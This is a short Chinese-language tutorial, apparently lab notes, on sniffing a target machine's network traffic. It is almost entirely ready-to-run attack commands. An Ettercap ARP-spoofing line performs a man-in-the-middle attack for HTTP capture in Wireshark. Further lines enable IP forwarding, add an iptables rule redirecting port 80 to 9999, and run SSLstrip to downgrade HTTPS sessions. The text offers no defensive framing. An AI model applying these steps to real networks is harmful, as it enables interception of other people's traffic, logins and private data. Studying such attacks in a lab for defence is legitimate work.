HTTP数据监听
首先使用Ettercap工具对靶机实施中间人攻击:
ettercap -Tq -M arp:remote /192.168.199.129// /192.168.199.2//
接着即可利用wireshark抓包工具监听靶机的数据包了。
HTTPS数据监听
首先需要开启路由转发:
echo 1 > /proc/sys/net/ipv4/ip_forward
接着通过iptables 将所有HTTP数据导入到自己指定的一个端口(如9999):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9999
然后使用SSLstrip监听上面指定的9999端口,获取靶机传输的信息:
sslstrip -a -1 9999
最后实施ARP欺骗即可。